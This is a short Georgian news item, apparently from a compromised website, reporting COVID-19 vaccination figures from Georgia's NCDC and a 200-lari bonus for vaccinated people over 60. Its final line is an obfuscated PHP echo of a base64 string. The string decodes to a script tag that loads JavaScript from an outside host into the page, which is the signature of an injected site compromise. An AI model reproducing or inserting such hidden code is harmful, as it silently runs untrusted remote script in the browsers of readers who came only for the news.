celsiusi
ავერსი საქკაბელი
ბოლო 24 საათში საქართველოში 6 976 ადამიანი აიცრა. დაავადებათა კონტროლის ეროვნული ცენტრის (NCDC) ინფორმაციით, სრულად ვაქცინირებულია 957 399 ადამიანი, რაც მოზრდილი მოსახლეობის 33.5%-ს შეადგენს.
 
სულ მცირე 1 დოზით აცრილია 1 057 086 ადამიანი ანუ მოზრდილი მოსახლეობის 37.2%.
 
8 ნოემბერს მთავრობის მიერ მიღებული გადაწყვეტილებით, 200-ლარიან დანამატს მიიღებენ 60 წლიდან ზემოთ პირები, რომელიც აცირებიან.
 
აღსანიშნავია, რომ წლის ბოლომდე მთავრობის გეგმით მოზრდილი მოსახლეობის 60% უნდა აიცრას.
944
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");